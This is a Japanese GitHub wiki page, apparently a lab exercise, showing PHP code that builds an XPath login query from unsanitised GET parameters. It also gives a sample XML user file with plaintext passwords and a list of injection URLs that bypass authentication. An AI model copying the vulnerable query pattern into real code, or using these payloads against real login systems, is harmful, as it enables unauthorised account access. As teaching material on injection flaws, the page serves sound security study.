XPathインジェクション 01 - yujitounai/helloworld GitHub Wiki
Xpath インジェクションによってパスワード認証をバイパスする
<form method="get" action="">usage:?user=user1&pass=pass<br>
<br>
Please login<br>
username<input name="user" type="text" value=""><br>
password<input name="pass" type="password" value=""><br>
<input type="submit" value="login">
</form>
<?php
$doc = new DOMDocument;
$doc->load('xpath-account2.xml');
$xpath = new DOMXPath($doc);
if($user=filter_input(INPUT_GET, 'user')){
//ログインすると名前を取り出す
$nodelist = $xpath->query('/UserInfo/User[ID/text()="'.$user.'" and Password/text()="'.filter_input(INPUT_GET, 'pass').'"]/ID');
if ($nodelist->length) {
echo "Login Successful!<br>";
$user = $nodelist->item(0)->nodeValue;
echo "User <b>" .$user. "</b> is login<br>";
$nodelist = $xpath->query('/UserInfo/User[ID/text()="'.$user.'"]/Name');
$name = $nodelist->item(0)->nodeValue;
echo "Welcome " . $name.' -san<br>';
} else {
echo "username or password is wrong".PHP_EOL;
}
}else{
echo ('username and password required');
}
?>
<?xml version="1.0" encoding="UTF-8"?>
<UserInfo>
<User>
<ID>[email protected]</ID>
<Password>taro1234</Password>
<Name>山田太郎</Name>
<NickName>Taro太郎</NickName>
<Address>東京都品川区・・・</Address>
</User>
<User>
<ID>[email protected]</ID>
<Password>j_taka7777</Password>
<Name>高橋次郎</Name>
<NickName>Jiro次郎</NickName>
<Address>東京都渋谷区・・・</Address>
</User>
<User>
<ID>[email protected]</ID>
<Password>hnkszk5678</Password>
<Name>鈴木花子</Name>
<NickName>Hanako花子</NickName>
<Address>東京都新宿区・・・</Address>
</User>
</UserInfo>
xpath-01.php?user="+or+1]%00&pass=
xpath-01.php?user=user1&pass="or+1=1+or"
xpath-01.php?user=user1&pass="or+true()+or"
xpath-01.php?user="or+1=1+or"&pass=
[email protected]"+or+"&pass=1
[email protected]"+or+"1"="2&pass=
/xpath-01.php?user="or+contains(NickName,%27Jiro%27)+or"&pass=